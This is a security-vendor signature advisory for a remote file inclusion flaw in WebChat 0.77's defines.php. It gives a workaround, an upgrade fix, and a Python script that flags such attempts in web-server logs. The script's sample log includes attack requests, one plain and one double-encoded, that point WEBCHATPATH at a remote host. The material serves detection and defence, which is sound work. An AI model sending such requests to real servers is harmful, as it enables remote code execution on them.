Severity: High
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
Description
This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the WebChat defines.php script.
Additional Information
WebChat is a chat application for JavaScript-compatible web browsers, written in PHP. WebChat is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.
This vulnerability is the result of insufficient sanitization of remote user-supplied data passed through a URI parameter of the 'defines.php' PHP page. Under some circumstances, remote attackers can alter the path of the 'db_mysql.php' and 'english.php' include files to point to an external file by manipulating the '$WEBCHATPATH' URI parameter.
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.
This vulnerability was reported for WebChat 0.77. It is not known if other versions are affected.
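As an added example (not part of the original signature description and not WebChat's own code), the Python script below applies the detection described above to constructed web-server access-log lines: it flags requests for defines.php whose WEBCHATPATH query parameter decodes to a URL with a remote scheme, the case in which allow_url_fopen would let include() fetch attacker-supplied code. The log lines, addresses and URLs are constructed for illustration.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format) for this example;
# they are not taken from the original page or from any real WebChat deployment.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /webchat/defines.php?WEBCHATPATH=http://198.51.100.7/x HTTP/1.1" 200 512
203.0.113.6 - - [10/Oct/2023:13:55:40 +0000] "GET /webchat/defines.php?WEBCHATPATH=%2568%2574%2574%2570%253A%252F%252F198.51.100.7%252Fx HTTP/1.1" 200 512
192.0.2.10 - - [10/Oct/2023:13:56:01 +0000] "GET /webchat/defines.php?WEBCHATPATH=%2Fvar%2Fwww%2Fwebchat%2F HTTP/1.1" 200 512
192.0.2.11 - - [10/Oct/2023:13:56:20 +0000] "GET /webchat/index.php HTTP/1.1" 200 2048
"""

# Request line inside a CLF entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Schemes that allow_url_fopen lets include() fetch from a remote host.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)


def remote_include_value(target: str) -> Optional[str]:
    """Return the decoded WEBCHATPATH value if it points at a remote host, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/defines.php"):
        return None
    # parse_qs percent-decodes once; decode a second time so a double-encoded
    # scheme (e.g. %2568ttp) cannot slip past the scheme check.
    for value in parse_qs(parts.query).get("WEBCHATPATH", []):
        decoded = unquote(value)
        if REMOTE_SCHEME_RE.match(decoded):
            return decoded
    return None


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, decoded WEBCHATPATH) for every line matching the RFI pattern."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        value = remote_include_value(m.group("target"))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"possible RFI attempt from {ip}: WEBCHATPATH={value}")
```

Access logs only record the query string, so a value sent in a POST body would need request-body logging or an inline IPS such as the signature described here to be seen.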
Affected
- Webdev Webchat 0.77
Response
Workaround:
Exploitation of this type of vulnerability may not be possible unless both the 'allow_url_fopen' and 'register_globals' directives are enabled in the site's PHP configuration. Modify the PHP configuration file, php.ini, to disable directives that are not needed.
An unofficial unsupported patch can be found at: PHPSecure.info
Solution:
The vendor has released a fix to address this issue:
Webdev Webchat 0.77:
Upgrade to Webdev Webchat 0.78